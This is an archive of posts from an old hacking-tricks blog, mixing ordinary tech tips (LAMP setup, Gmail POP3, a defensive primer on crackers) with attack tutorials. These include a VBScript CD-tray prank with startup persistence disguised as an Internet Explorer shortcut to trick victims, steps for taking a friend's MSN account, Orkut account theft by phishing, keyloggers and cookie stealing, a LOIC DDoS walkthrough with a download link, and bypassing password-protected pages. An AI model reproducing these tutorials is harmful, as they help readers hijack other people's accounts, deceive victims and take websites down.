activehackers.blogspot.com

Recovering wordpress password without recovery email.

2010-03-13T19:43:00.000-08:00

Do you have a question like,

How to recover a wordpress password? Or I forgot wordpress administrator account password?

Hi there, I got a new hacking trick for you!
Well, it's not actually hacking, but recovering the password, of wordpress cms. I just went through this process few moments before.

Well, if you have forgottten your wordpress password of admin or any user, then, well, recovering it is what I was searching, but instead I found, how to change it without an recovery email. Well, I did it as below.

Step 1:

Firtly, you should login to your cpanel, where you got the wordpress installed.

Then, chose the icon named phpMyAdmin

If you have more than one databases in your cpanel, then you need to identify, which database are you going to use, simply your wordpress looks something like something_wrdp1 or like that.

Then, after choosing the database, click it.

Then, chose wp_users in the sidebar of the page.

Then, click "browse" on the top of the data base.

As you can see, the users listed below, click on the "Edit" sign represented by a pen or pencil icon.

Then you can see list of details such as, username, email, encrypted password and other details.

Step 2:

Now, go to google and search for md5 encryption, and follow the first result of the search which leads to md5 encryption official website, md5encryption.com.

Now, choose a new password and encrypt it.

Copy the enrypted password.

Step 3:
Then, paste the encrypted new password to the value of password which u discovered earlier in phpMyAdmin.

Save it, voilla, you are done with your new password and try logging in to the wordpress.

I just did it and I am happy.

Remove Encrypted Footer Links From Templates

2009-09-08T12:27:00.000-07:00

Here in this post, I will be telling you how to get rid of the footer links you often find in different themes and templates. Actually I came to know about it just few days ago when I was trying to build a blog using wordpress.
As you all know, the theme maker (or the author) releases the template with his links containing in it. It is obvious that he wants to get his profit through it. But what happens to the users is they don't like to keep them on their site. There may be many reasons that why you don't keep the footer links of the author of the theme, like you may be thinking that you theme may look unsuitable due to it. Or also you may think that why to keep unnecessary link. Further more, if you are really thinking about your sites ranking in search engines like google, the you may also want to remove all the inactive and unnecessary links which may decrease your site's ranking.

Well, whatever is the reason you want to get rid of it, just you do. But as you also know that those theme are generally released with GNU/GPL Licence, so actually this work is not considered as a good or legal process to do. So, personally I want to say you that please keep at least one link to the author sites so that the author is rewarded for his work.

Actually, removing links of the footer are not generally a problem, but sometimes it comes in a face of problem. What it means that, you might have seen footer links engraved with the theme you are going to use. So what are you gonna do?

Such things are generally encrypted with the template, can not be removed by the normal process. Actually guys, such encrypted footer links are not so easy to remove. But don't worry, I have got a trick to get rid of it, in a very few steps.

Simply, just go to the footer page in you control panel and open it in editing mode, then;

(Firstly, be sure to backup your footer template, so that you could restore it if something goes wrong.)

1. Enter this code just at the very beginning of the footer page : 

3. Then save the footer page and then browse your website/blog in general mode from the web browser. You will found nothing change till that moment. Just at the moment, view the page source from the tools menu of the web browser. The try to search the code you just entered before  . And after finding that, search for 

4. As soon you find those two codes, copy all the codes in between it without missing anycode between them.

5. Then go to your blog/site's control panel, go to footer page in editing mode, and the finally replace all the old codes with the new one you just got from your website's source code.

6. Modify the html code as you want. Finally, after you're done, save and exit.

7. You're done. Hurray, you are done!

Turn Off Your Monitor By Keyboard

2009-08-28T12:04:00.000-07:00

Hey guys, have you ever tried to turn off your monitor from your keyboard? Here is how you can do it.

PushMonitorOff is a tiny application which easily allows you to turn your monitor off directly from your keyboard. This option usually comes in laptop where you don'e have a separate monitor power button. You can use this application by downloading it from here.

This application is very easy to use. Just use your shift+f1 key to switch it on or off and also you can modify the shortcut keys as well.

Hacking Java Script Sites

2009-08-24T11:52:00.001-07:00

I know dis is lame but just would like to share wid u.have nothing for next half an hour so typing it.

Here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.
For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Setting Up UBUNTU Lamp

2009-08-24T11:42:00.001-07:00

This guide will help newbies set up a fully working LAMP (Linux, Apache, MySQL, PHP) server using on Ubuntu 8.04 Hardy Heron. Doing do will allow you to use various PHP applications such as the popular phpBB forums and WordPress blog in addition to the basic HTML pages and files. I write this based on an “out of the box” Ubuntu.

Let’s begin…

Install Packages
First, install the required packages by typing the following into the terminal:

sudo apt-get install apache2 php5 libapache2-mod-php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin

This will install Apache, PHP, MySQL, their respective modules, and phpMyAdmin. Enter your preferred root password for mySQL when prompted and choose apache2 to be automatically configured.

If you’d like, you can test whether if Apache is working properly by going to http://localhost/ in your web browser.

Letting Other Computers on the Same Network Connect (Optional)

Optionally, if you want computers on the same network to connect to the server you may want to edit /etc/mysql/my.cnf by invoking the command:

sudo gedit /etc/mysql/my.cnf

Then, replace the following line with your own IP address.

bind-address = 127.0.0.1

Configuring
To enable PHP and MySQL to work together, edit the php.ini file:

sudo gedit /etc/php5/apache2/php.ini

Then un-comment the following line. Save and close the file.

;extension = mysql.so

Accessing PHPMyAdmin
Edit the Apache configuration file:

sudo gedit /etc/apache2/apache2.conf

Add the following line to the bottom of the file. Save and close.

Include /etc/phpmyadmin/apache.conf

Restart Apache.

sudo /etc/init.d/apache2 restart

Testing PHP
Create and edit a file called testphp.php in your /var/www/ folder:

sudo gedit /var/www/testphp.php

Insert the following text inside that file and save:

Go back to your web browser and navigate to:

http://localhost/testphp.php

The PHP page should display. If a download window appears instead, something went wrong. Try reinstalling php5 and libapache2-mod-php5.

Testing phpMyAdmin
Navigate your web browser to:

http://localhost/phpmyadmin/

If the phpMyAdmin login page displays, then…

You are done. That wasn’t so hard.

Now that you have LAMP running, why not try some applications? To manage your server remotely, it would probably be a good idea to install SSH.

Note: The root directory of your web server is /var/www/

CD Drive Hacking: A Fun

2009-07-03T02:52:00.000-07:00

Hey guys, wanna have fun-hacking with ur CD drive. Copy the following code to notepad, and then save as CDfun.vbs, remember the extension ".vbs". Now double click on the file you just made, your cd drive will now repeatedly starts moving in and out. The code is as;

set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()

Now this is funny but what if it was even funnier. What if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

This knowledge is donated by Jai prakash, jai1147@gmail.com, thanks to Jai!

An Introduction To Hacking

2009-07-02T02:32:00.000-07:00

What are hackers?
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...

What are crackers?
Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. A cracker is someone too who does reverse eng. on programs and covers LL programming languages (like ASM 4 example) and modifies the program, mostly in aim of removing limitations !

What damage can a hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.

How does a firewall protect me?
Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.

How do I report hackers?
When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):
Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).
Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.
Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.
This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.
Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!
Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)

What is a port scan?
A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.

What is an IP address?
An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.

How can I hack?
I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.

How do hackers hack?
There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139
ICMP Ping - Internet Control Message Protocol
FTP - TCP 21
rpc.statd - TCP 111, TCP 9704
lpr - TCP 515
HTTP - TCP 80

How can NetBIOS be harmful?
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.

How can ICMP Ping be harmful?
ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.

How can FTP be harmful?
FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.

How can rpc.statd be harmful?
This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.

How can lpr be harmful?
This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.

How can HTTP be harmful?
HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).

HTTP uses TCP port 80. I am not sure if Microsoft has released a patch to correct the problems I describe.

Bluetooth Sniffing

2009-06-19T12:01:00.000-07:00

Gmail POP3 Configuration

2009-06-19T05:25:00.000-07:00

I received several emails lately that asked me how to setup email clients so that they could retrieve Gmail emails using the POP3 protocol. The Gmail POP3 configuration is fortunately not that complex: The major problem that most users run into is that POP3 has to be enabled in the Gmail web interface before they can actually retrieve their emails in another email client.

Enabling POP3 in Gmail is therefor a two-step process. POP3 needs to be enabled on the Gmail website first before the other email client is configured to connect to Gmail using the POP3 protocol.

Enabling Gmail POP3

Open the Gmail homepage, log into your Gmail account and click on the [Settings] link in the top right corner of the screen to open the Gmail configuration. Now select the [Forwarding and POP/IMAP] link which should open a page just like the one you see below on the screenshot.

You basically got two options here to enable POP3. The first [Enable POP for all mail (even mail that's already been downloaded)] enables POP3 in Gmail for all email messages even those that have already been retrieved while the second [Enable POP for mail that arrives from now on] enables POP3 from that moment on which means that old emails cannot be retrieved. A click on the Save Changes button will save the changes and allow POP3 connections.

Gmail POP3 Data

It is time to create the accounts in the email client now that POP3 has been enabled in Gmail. The procedure is different depending on the email client at hand. Below are the values that need to be entered into the email client.

Email Address: Enter your full Gmail email address
Password: Enter your email password
Incoming Server: pop.gmail.com
Incoming Server Port: 995
Outgoing Server: smtp.gmail.com
Outgoing server (SMTP) port: 587
Encryption: TLS

You can check out the help pages over at Gmail that contain configuration walkthroughs for various popular email clients.

Automated Email Archiving and Monitoring In Microsoft Outlook

2009-06-15T07:42:00.001-07:00

It is sometimes important to monitor and archive emails, especially in a business environment. One example would be that a supervisor wants a copy of every email that an employee sends to customers to keep track on everything. Probably the easiest way of achieving this is to add the supervisor as a cc or bcc recipient in the emails. This is supported by all modern email clients be they web based such as Gmail, Microsoft Live Mail and Yahoo Mail or desktop based such as Mozilla Thunderbird or Microsoft Outlook.

The Outlook Auto BCC / CC add-in has been designed specifically for Microsoft Outlook. It allows the installation of automatic bcc and cc recipients in email messages based on rules. Possibilities include setting a rul for all outgoing emails from all email accounts, messages send to specific email addresses or messages that match specific phrases in the subject or attachment.

It is furthermore possible to create exceptions to rules so that certain email addresses and emails do not get archived or monitored.

This is an excellent solution for email archiving as well as it it unproblematic to send all emails to another email account for backup purposes. It would for example be possible to create a backup Gmail account and add that new email account as a BCC recipient for all email messages that are send from Microsoft Outlook. Another interesting option is to configure the Microsoft Outlook add-in so that only emails that contain specific keywords or phrases are send to another recipient.

The main benefit of this email archiving and monitoring solution is that the user behind the monitor does not has to remember to add a BCC or CC recipient as the Outlook add-in manages all aspects of this automatically.

Auto BCC / CC is compatible with Microsoft Outlook 2007, Outlook 2003, Outlook XP (2002) and Outlook 2000.

MSN (Hotmail) Hacking Software

2009-06-13T14:52:00.000-07:00

MSN Password Hacker scans your computer for stored MSN account passwords and thus you can hack your msn account password. But, remember, for this msn hacking software to work, there must be locally stored msn passwords on victim computer.

Steps to Use MSN Password Hacker:

1. Download MSN password hacker software.

2. Now, extract the zip file and run WLMPasswords.exe. No installation is required for this.

3. In the text field next to "Filter", type in the Windows live messenger email address to be hacked and hit Check.

4. After this, MSN password hacker will scan computer for msn password.

5. And then, you will get MSN account password in plain "text format". Thus, windows live messenger account hacked !!!

Now, how do you hack friend's msn windows live messenger account password. Simply, run the msn hacking program on victim computer with his windows live messenger email id in Filter and hit check. Thus, MSN Password hacker will give you msn windows live messenger password and you will be able to hack his windows live messenger account...cheers.

Note: For this msn hacking software- MSN password hacker to work, you should have .NET Framework version 2.0 and windows live messenger installed.

I hope you are now able to hack friend's msn windows live messenger account password using this msn hacking software- MSN Password Hacker. If you have any query or comment about MSN Password hacker, please mention in comments section.

Enjoy HaCkInG.....

All methods of hacking orkut

2009-06-13T14:28:00.000-07:00

Orkut has became major social network in India and even abroad. So, naturally, www.orkut.com is becoming a target of hackers. There are many hacking tricks or hacks to hack orkut account passwords. So, i have listed most popular Orkut account password hacking tricks. Below, i have mentioned all Orkut account password hacking methods.

1. Orkut Phishing:

As i have stated in all articles, Phishing is first priority to hack Orkut account passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added on how to make phisher in my article Hack email/orkut account by Phishing.

2. Keylogging :

This is most easy method ever found. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. You can use Ardamax keylogger to hack orkut account password.

3. Community links :

Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack your orkut profile account.

4. Orkut Javascript hack :

This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker can hack his orkut account using orkut cookies. I have written more on orkut cookie stealing in Hack Orkut account by Cookie stealing.

5. Orkut New Features :

I received an orkut scrap that looks like they are giving the user a choice of using new features for orkut with your ID and password, of course!! When user submits the orkut page, his ID and password is mailed to orkut hacker and thus his orkut account is hacked.

6. Primary email address hack :

If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!

So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address.

So friends, i hope you all are now knowing methods to hack orkut account passwords. I have tried to keep this orkut hacking article simple. If you have any comments or new methods on how to hack orkut account password, please mention it in comments section.

Enjoy HaCkInG.....

Hacking Down Websites

2009-06-13T12:32:00.000-07:00

In this tutorial, I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

DOWNLOAD HERE: http://rapidshare.com/files/104926676/LOIC.exe

I would like to inform you that i have not yet tried this hack, so i cant tell you much about it...sorry for that. But, you can help me out by commenting your experience or even by mailing me.

Enjoy HaCkInG.....

Shutdown Computer Using Your Mobile Phone

2009-06-13T10:17:00.000-07:00

Be Safe of Phishing

2009-06-12T21:34:00.000-07:00

Twitter User Spamming Himself Crazy

2009-06-12T20:28:00.000-07:00

A Twitter user who has effectively spammed himself senseless reaches out to us for help. And we’re going to oblige. The only trouble is, he’s making yet another error in judgment, because my guess is this is going to make things worse.

Ryan Barr started a petition on Twitter to ask AT&T to “offer reasonable iPhone 3GS upgrade prices.” And even though it’s unlikely that AT&T cares even a little bit about this or any other petition, it’s getting some traction. Nearly 10,000 people have “signed” it.

The problem is that every time someone signs the petition it autotweets the message “Petition: AT&T to offer reasonable iPhone 3GS upgrade prices http://twitition.com/f96aq @ryanbarr,” which sends a message back to Barr and absolutely pollutes the reply stream (the only really useful way to interact with Twitter).

Anyway, here’s Barr’s message. I just signed the petition myself and I’m guessing a lot of you will, too. But don’t worry Ryan. It’ll slow down eventually, probably.

Dear TechCrunch,

My name is Ryan Barr, known on Twitter as @ryanbarr . If you may have noticed, I started a petition (or twitition) found here: http://twitition.com/f96aq .

I want out.

When I first started the petition, it was due to a rant I was having about the price of the phone. It didn’t take long for me to truly not care about the prices as much as I had. And it didn’t take much longer for the petition I started to go out of control.

At the time of this e-mail the petition just passed 9200 signatures. For each signature, a message is tweeted as follows:

“Petition: AT&T to offer reasonable iPhone 3GS upgrade prices http://twitition.com/f96aq @ryanbarr”

That’s right, 9200 @ryanbarr’s over the span of two (going on three) days. This does not include the unnecessary retweets people also make. I can no longer stand not being able to see real replies in my timeline. I have AT&T employees following me and saying stuff behind my back when I was just ranting on a site that seemed to have little activity.

I completely, COMPLETELY regret pressing the submit button. As the petition nears the 10000 mark I fear even more. As at that mark, TweetMeme will show me as a TM_10000 (@http://twitter.com/TM_10000) … the first, ever.

TechCrunch — you have the power to make businesses grow. You have the power to make or break the reputation of a new device. Please, help me find a way out of this petition. The attention I am receiving is unwanted — I just want to be able to come clear to all the signers and say, “I don’t want in this anymore. I didn’t mean for it to last this long.”

Thanks for anything and for the great reads over the longhaul.

Best Regards,
Ryan Barr

How To Prevent Your Email Being Hacked

2009-06-12T06:58:00.000-07:00

Nowadays, its very common to hear about various incidents of Gmail hacking by Gmail phisher. Today, online privacy is maintained only if the user is aware of various hacks used to hack email accounts. Hence, i thought of writing an article on the same topic of preventing Gmail from being hacked by hackers. Friends, i highly recommend you to read this article to prevent ur future damages.

>>What is a phisher?

I have explained in my post Hack email account password by phishing., Phishing is the best working method of hacking email account. The advantage of phishing in email account hacking is that victim is not able to recognise the fake page (phisher) as this phisher matches with the original page(depends on hacker skills).

So, here i have mentioned few tips which you should follow to prevent hacking of your email account by hackers. So lets start:

1. Fishing filter:

I will recommend use of browser which has phishing filter. Internet browsers like Firefox 3.0(my favorite), Internet Explorer 7, Opera 7x which contain phishing filter should be used for safe browsing.

2. Do not provide sensitive information :

